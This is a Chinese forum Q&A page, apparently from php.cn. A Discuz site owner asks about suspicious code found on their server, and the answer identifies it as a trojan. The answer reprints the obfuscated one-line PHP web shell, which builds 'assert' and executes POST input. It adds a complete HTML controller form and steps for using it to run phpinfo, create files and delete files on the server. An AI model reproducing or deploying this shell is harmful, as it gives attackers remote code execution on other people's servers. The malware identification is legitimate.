Home > Backend Development > PHP Tutorial > discuz 里头有这段代码

discuz 里头有这段代码

WBOY
Release: 2016-06-13 12:22:12
Original
1001 people have browsed it

discuz 里面有这段代码
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

请问这是什么意思?
我的网站被主机屋封了,然后他们叫我删掉游戏登录器,我不太懂,就看了下FTP里面,
有这段代码,不会是黑客注入的吧?
------解决思路----------------------
是木马,利用assert来执行php函数的。

7.php

<br /><?php                  <br />@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  <br />@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  <br />@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  <br />[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?><br />
Copy after login


然后创建一个调用7.php的html文件,摆在任何位置都可以,action那里的7.php改为对应的http路径就可以了。
shell.html
<br /><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><br /><html><br /> <head><br />  <title> New Document </title><br /> </head><br /><br /> <body><br />  <form name="form1" method="post" action="http://fdipzone.com/fdipzone/7.php"><br />  <textarea name="-7" style="width:500px; height:300px"></textarea>  <br />  <input type="submit" value="submit"><br /></form><br /> </body><br /></html><br />
Copy after login


然后运行shell.html,
1.在textarea中输入phpinfo(); 后提交,可以看到phpinfo();的信息
2.如在textarea中输入file_put_contents('abc.php','', true); 后提交,则会在服务器上创建一个abc.php文件。
3.输入unlink('xxxxx'); 后提交,就能删除xxx文件。

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template